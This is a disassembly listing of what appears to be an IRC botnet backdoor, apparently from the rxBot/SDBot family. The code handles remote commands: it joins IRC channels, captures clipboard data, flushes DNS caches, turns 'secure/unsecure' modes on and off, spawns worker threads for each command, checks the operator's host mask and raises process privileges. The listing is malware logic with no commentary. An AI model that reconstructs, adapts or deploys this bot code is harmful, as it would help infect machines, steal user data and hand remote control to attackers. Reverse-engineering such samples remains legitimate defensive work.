call sub_409526
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_42B830
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 6
push eax
call sub_414F2C
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_73C]
push ebx
push eax
push offset sub_413B7C
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_412938
loc_412926: ; CODE XREF: sub_40D2E0+5656�j
cmp [ebp+var_560], ebx
jnz short loc_412953
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412926
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_40D2E0+5644�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42B7E4
loc_412944: ; CODE XREF: sub_40D2E0+3625�j
; sub_40D2E0+3722�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
loc_412953: ; CODE XREF: sub_40D2E0+3609�j
; sub_40D2E0+3706�j ...
cmp [ebp+var_8], ebx
jnz loc_41327F
push ebx
push edi
jmp loc_41019D
; ---------------------------------------------------------------------------
loc_412963: ; CODE XREF: sub_40D2E0+1879�j
; sub_40D2E0+188E�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412976
push esi
call sub_4159EF
jmp short loc_41297D
; ---------------------------------------------------------------------------
loc_412976: ; CODE XREF: sub_40D2E0+568C�j
push 8
call sub_415193
loc_41297D: ; CODE XREF: sub_40D2E0+5694�j
cmp eax, ebx
pop ecx
jz loc_4133B5
push eax
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_405821
loc_412998: ; CODE XREF: sub_40D2E0+5B67�j
add esp, 10h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_4129A0: ; CODE XREF: sub_40D2E0+184F�j
; sub_40D2E0+1864�j
mov eax, ds:dword_436390
cmp eax, ebx
jz short loc_4129BD
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_4129B6
push offset unk_42B7B0
jmp short loc_4129D2
; ---------------------------------------------------------------------------
loc_4129B6: ; CODE XREF: sub_40D2E0+56CD�j
push offset unk_42B774
jmp short loc_4129D2
; ---------------------------------------------------------------------------
loc_4129BD: ; CODE XREF: sub_40D2E0+56C7�j
push offset unk_42B738
jmp short loc_4129D2
; ---------------------------------------------------------------------------
loc_4129C4: ; CODE XREF: sub_40D2E0+1825�j
; sub_40D2E0+183A�j
call sub_409448
test eax, eax
jz short loc_4129E8
push offset unk_42B704
loc_4129D2: ; CODE XREF: sub_40D2E0+4AFC�j
; sub_40D2E0+56D4�j ...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
jmp loc_40F52B
; ---------------------------------------------------------------------------
loc_4129E8: ; CODE XREF: sub_40D2E0+56EB�j
push offset unk_42B6C8
jmp short loc_4129D2
; ---------------------------------------------------------------------------
loc_4129EF: ; CODE XREF: sub_40D2E0+17FB�j
; sub_40D2E0+1810�j
cmp [ebp+var_8], ebx
jnz short loc_412A0E
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_412A0E: ; CODE XREF: sub_40D2E0+5712�j
push ebx
push [ebp+var_4]
call sub_409105
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
push offset dword_42B688
loc_412A2B: ; CODE XREF: sub_40D2E0+5A09�j
; sub_40D2E0+5A3B�j
call sub_40A5B3
add esp, 18h
jmp loc_4133B5
; ---------------------------------------------------------------------------
loc_412A38: ; CODE XREF: sub_40D2E0+171C�j
; sub_40D2E0+1731�j
push 7
call sub_415174
test eax, eax
pop ecx
jle short loc_412A4B
push offset dword_42B650
jmp short loc_412A6C
; ---------------------------------------------------------------------------
loc_412A4B: ; CODE XREF: sub_40D2E0+5762�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_409BB2
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_412A67
push offset dword_42B618
jmp short loc_412A6C
; ---------------------------------------------------------------------------
loc_412A67: ; CODE XREF: sub_40D2E0+577E�j
push offset dword_42B5E8
loc_412A6C: ; CODE XREF: sub_40D2E0+2C51�j
; sub_40D2E0+2D87�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
pop ecx
pop ecx
loc_412A7A: ; CODE XREF: sub_40D2E0+15C6�j
; sub_40D2E0+2D61�j ...
cmp [ebp+var_8], ebx
jnz loc_41327F
push ebx
push [ebp+var_4]
loc_412A87: ; CODE XREF: sub_40D2E0+3961�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_412A97: ; CODE XREF: sub_40D2E0+2ECB�j
call sub_40BAE7
add esp, 14h
jmp loc_41327F
; ---------------------------------------------------------------------------
loc_412AA4: ; CODE XREF: sub_40D2E0+16F2�j
; sub_40D2E0+1707�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_408AF2
jmp loc_40D6A4
; ---------------------------------------------------------------------------
loc_412ABD: ; CODE XREF: sub_40D2E0+16C8�j
; sub_40D2E0+16DD�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40B934
jmp loc_40D6A4
; ---------------------------------------------------------------------------
loc_412ADA: ; CODE XREF: sub_40D2E0+169E�j
; sub_40D2E0+16B3�j
or edi, 0FFFFFFFFh
call ds:dword_422048 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_412B03
push esi
call sub_4159EF
pop ecx
mov edi, eax
loc_412B03: ; CODE XREF: sub_40D2E0+5818�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_412B1C
cmp edi, 0FFFFFFFFh
jnz loc_4133B5
loc_412B1C: ; CODE XREF: sub_40D2E0+5831�j
push ebx
call sub_409D67
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_42B5C0
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
jmp loc_40FECB
; ---------------------------------------------------------------------------
loc_412B5F: ; CODE XREF: sub_40D2E0+1674�j
; sub_40D2E0+1689�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40726C
add esp, 0Ch
push offset unk_42B590
jmp loc_40F1A6
; ---------------------------------------------------------------------------
loc_412B7D: ; CODE XREF: sub_40D2E0+164A�j
; sub_40D2E0+165F�j
push 1Fh
call sub_415174
test eax, eax
pop ecx
jle short loc_412BA6
cmp [ebp+var_8], ebx
jnz loc_40D6A7
push ebx
push [ebp+var_4]
push offset unk_42B55C
push [ebp+var_8C]
jmp loc_40DC0E
; ---------------------------------------------------------------------------
loc_412BA6: ; CODE XREF: sub_40D2E0+58A7�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
jz short loc_412C07
push esi
push offset aFull ; "full"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_412C07
mov [ebp+var_46C], 1
loc_412C07: ; CODE XREF: sub_40D2E0+590A�j
; sub_40D2E0+591B�j
lea eax, [ebp+var_2DC]
push offset dword_42B524
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 1Fh
push eax
call sub_414F2C
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_4137A9
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_412C75
loc_412C5F: ; CODE XREF: sub_40D2E0+5993�j
cmp [ebp+var_460], ebx
jnz loc_41327F
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412C5F
; ---------------------------------------------------------------------------
loc_412C75: ; CODE XREF: sub_40D2E0+597D�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B4D4
jmp loc_413270
; ---------------------------------------------------------------------------
loc_412C86: ; CODE XREF: sub_40D2E0+1620�j
; sub_40D2E0+1635�j
cmp [ebp+var_8], ebx
jnz short loc_412CA5
push ebx
push [ebp+var_4]
push offset dword_42B4AC
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_412CA5: ; CODE XREF: sub_40D2E0+59A9�j
push [ebp+arg_4]
call ds:dword_436500 ; closesocket
call ds:dword_4363C8 ; WSACleanup
call sub_409288
push ebx
call ds:off_42212C
loc_412CC0: ; CODE XREF: sub_40D2E0+15F6�j
; sub_40D2E0+160B�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_409F1E
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
push offset dword_42B484
jmp loc_412A2B
; ---------------------------------------------------------------------------
loc_412CEE: ; CODE XREF: sub_40D2E0+14BC�j
; sub_40D2E0+14D1�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40A1D2
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
push offset dword_42B45C
jmp loc_412A2B
; ---------------------------------------------------------------------------
loc_412D20: ; CODE XREF: sub_40D2E0+1492�j
; sub_40D2E0+14A7�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A653
jmp loc_40D6A4
; ---------------------------------------------------------------------------
loc_412D39: ; CODE XREF: sub_40D2E0+1468�j
; sub_40D2E0+147D�j
cmp [ebp+var_C], ebx
mov [ebp+var_388], bl
jz short loc_412D78
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412D78
push esi
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412D78
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_388]
push 80h
push eax
call sub_4159FA
add esp, 10h
loc_412D78: ; CODE XREF: sub_40D2E0+5A62�j
; sub_40D2E0+5A6D�j ...
push [ebp+var_8C]
lea eax, [ebp+var_408]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_40C], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
mov eax, [ebp+var_8]
mov [ebp+var_300], eax
lea eax, [ebp+var_2DC]
push offset dword_42B434
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 1Dh
push eax
call sub_414F2C
add esp, 14h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_40A693
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_412E1B
loc_412E05: ; CODE XREF: sub_40D2E0+5B39�j
cmp [ebp+var_2FC], ebx
jnz loc_40D6A7
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412E05
; ---------------------------------------------------------------------------
loc_412E1B: ; CODE XREF: sub_40D2E0+5B23�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42B3EC
jmp loc_40D890
; ---------------------------------------------------------------------------
loc_412E2C: ; CODE XREF: sub_40D2E0+143E�j
; sub_40D2E0+1453�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A53B
push offset dword_42B3C4
call sub_40A5B3
jmp loc_412998
; ---------------------------------------------------------------------------
loc_412E4C: ; CODE XREF: sub_40D2E0+1414�j
; sub_40D2E0+1429�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
jz short loc_412EA6
push offset dword_42B3C0
push esi
call sub_4158A0
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_46C], eax
jmp short loc_412EAC
; ---------------------------------------------------------------------------
loc_412EA6: ; CODE XREF: sub_40D2E0+5BAA�j
mov [ebp+var_46C], ebx
loc_412EAC: ; CODE XREF: sub_40D2E0+5BC4�j
lea eax, [ebp+var_2DC]
push offset dword_42B394
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 20h
push eax
call sub_414F2C
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_414F97
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_412F16
loc_412F04: ; CODE XREF: sub_40D2E0+5C34�j
cmp [ebp+var_460], ebx
jnz short loc_412F31
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_412F04
; ---------------------------------------------------------------------------
loc_412F16: ; CODE XREF: sub_40D2E0+5C22�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset dword_42B34C
loc_412F22: ; CODE XREF: sub_40D2E0+489D�j
; sub_40D2E0+49B9�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
loc_412F31: ; CODE XREF: sub_40D2E0+4527�j
; sub_40D2E0+453F�j ...
lea eax, [ebp+var_2DC]
push eax
jmp loc_40EAC2
; ---------------------------------------------------------------------------
loc_412F3D: ; CODE XREF: sub_40D2E0+1398�j
; sub_40D2E0+13AD�j
push offset aBotid ; "botid"
push offset dword_42B324
jmp short loc_412F5B
; ---------------------------------------------------------------------------
loc_412F49: ; CODE XREF: sub_40D2E0+136E�j
; sub_40D2E0+1383�j
; DATA XREF: ...
push ds:dword_4C8CC0
call sub_409D67
pop ecx
push eax
push offset dword_42B2E8
loc_412F5B: ; CODE XREF: sub_40D2E0+5C67�j
lea eax, [ebp+var_2DC]
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 20h
jmp loc_40F56B
; ---------------------------------------------------------------------------
loc_412F88: ; CODE XREF: sub_40D2E0+1344�j
; sub_40D2E0+1359�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412FBA
cmp [ebp+var_C], ebx
jz short loc_412FC9
push esi
push [ebp+var_C]
call sub_415A50
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412FC9
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
jmp short loc_412FC9
; ---------------------------------------------------------------------------
loc_412FBA: ; CODE XREF: sub_40D2E0+5CB1�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_40BAA1
pop ecx
pop ecx
loc_412FC9: ; CODE XREF: sub_40D2E0+5CB6�j
; sub_40D2E0+5CC5�j ...
push 0FFFFFFFEh
jmp loc_40D6A9
; ---------------------------------------------------------------------------
loc_412FD0: ; CODE XREF: sub_40D2E0+131A�j
; sub_40D2E0+132F�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_40BAA1
push offset dword_42B298
call sub_40A5B3
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_412FF2: ; CODE XREF: sub_40D2E0+12F0�j
; sub_40D2E0+1305�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_40BAA1
push offset dword_42B258
call sub_40A5B3
add esp, 0Ch
xor eax, eax
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_413013: ; CODE XREF: sub_40D2E0+12C6�j
; sub_40D2E0+12DB�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_405756
jmp loc_411462
; ---------------------------------------------------------------------------
loc_413029: ; CODE XREF: sub_40D2E0+1221�j
; sub_40D2E0+1236�j
push [ebp+esi+var_90]
push 1Fh
push offset dword_42B248
push offset dword_42B23C
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_413041: ; CODE XREF: sub_40D2E0+11F7�j
; sub_40D2E0+120C�j
push [ebp+esi+var_90]
push 1Ch
push offset dword_42B230
push offset dword_42B220
jmp loc_40E341
; ---------------------------------------------------------------------------
loc_413059: ; CODE XREF: sub_40D2E0+1022�j
; sub_40D2E0+1037�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_413078
push edi
call sub_4159EF
test eax, eax
pop ecx
jz short loc_413078
push edi
call sub_4159EF
pop ecx
jmp short loc_41307D
; ---------------------------------------------------------------------------
loc_413078: ; CODE XREF: sub_40D2E0+5D82�j
; sub_40D2E0+5D8D�j
mov eax, ds:dword_42ACC0
loc_41307D: ; CODE XREF: sub_40D2E0+5D96�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_478], eax
cmp esi, ebx
jz short loc_4130A2
push esi
loc_41308F: ; CODE XREF: sub_40D2E0+5DD1�j
lea eax, [ebp+var_488]
push 10h
push eax
call sub_4159FA
add esp, 0Ch
jmp short loc_4130B9
; ---------------------------------------------------------------------------
loc_4130A2: ; CODE XREF: sub_40D2E0+5DAC�j
cmp [ebp+var_9C7], bl
jz short loc_4130B3
lea eax, [ebp+var_D8]
push eax
jmp short loc_41308F
; ---------------------------------------------------------------------------
loc_4130B3: ; CODE XREF: sub_40D2E0+5DC8�j
mov [ebp+var_488], bl
loc_4130B9: ; CODE XREF: sub_40D2E0+5DC0�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_46C], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_468], eax
lea eax, [ebp+var_508]
push eax
mov [ebp+var_50C], esi
call sub_4159FA
add esp, 0Ch
push [ebp+var_478]
push esi
call sub_409526
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_426E74
push eax
call sub_415480
push ebx
lea eax, [ebp+var_2DC]
push 11h
push eax
call sub_414F2C
add esp, 1Ch
mov [ebp+var_474], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_50C]
push ebx
push eax
push offset sub_406630
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_474]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_41316A
loc_413154: ; CODE XREF: sub_40D2E0+5E88�j
cmp [ebp+var_464], ebx
jnz loc_40D6A7
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_413154
; ---------------------------------------------------------------------------
loc_41316A: ; CODE XREF: sub_40D2E0+5E72�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B1D8
jmp loc_40D890
; ---------------------------------------------------------------------------
loc_41317B: ; CODE XREF: sub_40D2E0+FCE�j
; sub_40D2E0+FE3�j ...
push edi
push offset aSecure ; "secure"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_4131A3
push edi
push offset aSec ; "sec"
call sub_4158A0
pop ecx
mov [ebp+var_46C], ebx
test eax, eax
pop ecx
jnz short loc_4131AD
loc_4131A3: ; CODE XREF: sub_40D2E0+5EAA�j
mov [ebp+var_46C], 1
loc_4131AD: ; CODE XREF: sub_40D2E0+5EC1�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_4159FA
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_46C], ebx
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_4131F4
mov eax, offset aUnsecuring ; "Unsecuring"
loc_4131F4: ; CODE XREF: sub_40D2E0+5F0D�j
push eax
push offset dword_42B18C
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_4159FA
push ebx
lea eax, [ebp+var_2DC]
push 1Ah
push eax
call sub_414F2C
add esp, 1Ch
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_414396
push ebx
push ebx
call ds:dword_422070 ; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_43BED4[ecx], eax
jz short loc_413264
loc_413252: ; CODE XREF: sub_40D2E0+5F82�j
cmp [ebp+var_460], ebx
jnz short loc_41327F
push 32h
call ds:dword_422054 ; Sleep
jmp short loc_413252
; ---------------------------------------------------------------------------
loc_413264: ; CODE XREF: sub_40D2E0+5F70�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
push offset unk_42B140
loc_413270: ; CODE XREF: sub_40D2E0+3DA5�j
; sub_40D2E0+4AC1�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_415480
add esp, 0Ch
loc_41327F: ; CODE XREF: sub_40D2E0+2EB3�j
; sub_40D2E0+3959�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40A5B3
jmp loc_40D896
; ---------------------------------------------------------------------------
loc_413290: ; CODE XREF: sub_40D2E0+FA4�j
; sub_40D2E0+FB9�j
push offset aAbosal7Tool ; "ABOSAL7 tool"
push offset dword_42B120
jmp loc_40F51F
; ---------------------------------------------------------------------------
loc_41329F: ; CODE XREF: sub_40D2E0+F7A�j
; sub_40D2E0+F8F�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_4132FF
push esi
call sub_4159EF
cmp eax, ebx
pop ecx
jl short loc_4132F4
cmp eax, 2
jge short loc_4132F4
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_4132E9
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2DC]
push offset dword_42E4F4
push eax
call sub_415480
add esp, 0Ch
mov [esi], bl
jmp loc_40F2C5
; ---------------------------------------------------------------------------
loc_4132E9: ; CODE XREF: sub_40D2E0+5FE8�j
push eax
push offset dword_42B0E4
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_4132F4: ; CODE XREF: sub_40D2E0+5FD3�j
; sub_40D2E0+5FD8�j
push eax
push offset dword_42B0A8
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_4132FF: ; CODE XREF: sub_40D2E0+5FC8�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_413304: ; CODE XREF: sub_40D2E0+6040�j
push [ebp+var_94]
push edi
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_413327
inc esi
add edi, 80h
cmp esi, 2
jl short loc_413304
jmp loc_40F2C5
; ---------------------------------------------------------------------------
loc_413327: ; CODE XREF: sub_40D2E0+6034�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
push offset dword_42E4F4
jmp loc_40F2B6
; ---------------------------------------------------------------------------
loc_413341: ; CODE XREF: sub_40D2E0+F50�j
; sub_40D2E0+F65�j
push [ebp+var_90]
push offset dword_42E464
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_4133B5
call sub_4150F5
push ebx
call ds:off_42212C
loc_413363: ; CODE XREF: sub_40D2E0+F26�j
; sub_40D2E0+F3B�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_9B8], bl
setnz al
push eax
lea eax, [ebp+var_928]
push ds:dword_42ACE4
push eax
call sub_41416F
add esp, 10h
lea eax, [ebp+var_928]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
lea eax, [ebp+var_928]
push eax
push offset dword_42B074
loc_4133AE: ; CODE XREF: sub_40D2E0+4344�j
; sub_40D2E0+49D7�j ...
call sub_40A627
pop ecx
loc_4133B4: ; CODE XREF: sub_40D2E0+17E7�j
pop ecx
loc_4133B5: ; CODE XREF: sub_40D2E0+65F�j
; sub_40D2E0+66B�j ...
mov eax, [ebp+arg_24]
jmp loc_40D6AA
; ---------------------------------------------------------------------------
loc_4133BD: ; CODE XREF: sub_40D2E0+B28�j
; sub_40D2E0+B3B�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_40D6A7
cmp [ebp+var_AC], ebx
jnz loc_40D6A7
push offset asc_42E570 ; "!"
push [ebp+var_94]
call sub_416C8F
mov esi, eax
push offset dword_4325D4
push ebx
inc esi
call sub_416C8F
push offset asc_42B070 ; "~"
push eax
call sub_416C8F
push [ebp+arg_0]
mov edi, eax
push offset aCool ; "cool"
call sub_4158A0
add esp, 20h
test eax, eax
jz short loc_41345C
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push edi
push esi
push offset dword_42AFE8
jmp loc_40DC81
; ---------------------------------------------------------------------------
loc_41345C: ; CODE XREF: sub_40D2E0+6138�j
mov [ebp+arg_24], offset off_42ADDC
loc_413463: ; CODE XREF: sub_40D2E0+619F�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_415285
pop ecx
test eax, eax
pop ecx
jnz short loc_4134C3
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_42ADE0
jb short loc_413463
lea eax, [ebp+var_D8]
push edi
push eax
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 14h
lea eax, [ebp+var_D8]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push edi
push esi
push offset dword_42AFAC
jmp loc_40DC81
; ---------------------------------------------------------------------------
loc_4134C3: ; CODE XREF: sub_40D2E0+6192�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_4134C8: ; CODE XREF: sub_40D2E0+6212�j
cmp [ebp+arg_0], ebx
jz loc_40D6A7
cmp [edi], bl
jnz short loc_4134E8
push [ebp+arg_0]
push offset aCool ; "cool"
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jz short loc_4134F9
loc_4134E8: ; CODE XREF: sub_40D2E0+61F3�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_4134C8
jmp loc_40D6A7
; ---------------------------------------------------------------------------
loc_4134F9: ; CODE XREF: sub_40D2E0+6206�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_AA8]
push 7Fh
push eax
push esi
call sub_416D30
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_413530
push ebx
push [ebp+var_4]
push offset dword_42AF80
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BAE7
add esp, 14h
loc_413530: ; CODE XREF: sub_40D2E0+6234�j
lea eax, [ebp+var_D8]
push eax
push offset dword_42AF50
jmp loc_40D890
; ---------------------------------------------------------------------------
loc_413541: ; CODE XREF: sub_40D2E0+20E�j
; sub_40D2E0+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 0Ch
push offset aXi ; "+xi"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40BAA1
add esp, 10h
mov ds:dword_4C8E3C, edi
jmp loc_40D57D
sub_40D2E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41358D proc near ; CODE XREF: sub_40767D+45�p
; sub_40767D+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_42211C ; GetCurrentProcess
push eax
call ds:dword_43644C ; OpenProcessToken
test eax, eax
jnz short loc_4135AC
leave
retn
; ---------------------------------------------------------------------------
loc_4135AC: ; CODE XREF: sub_41358D+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call ds:dword_436424 ; LookupPrivilegeValueA
test eax, eax
jz short loc_4135EA
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_4135D3
or [ebp+var_8], 2
jmp short loc_4135D7
; ---------------------------------------------------------------------------
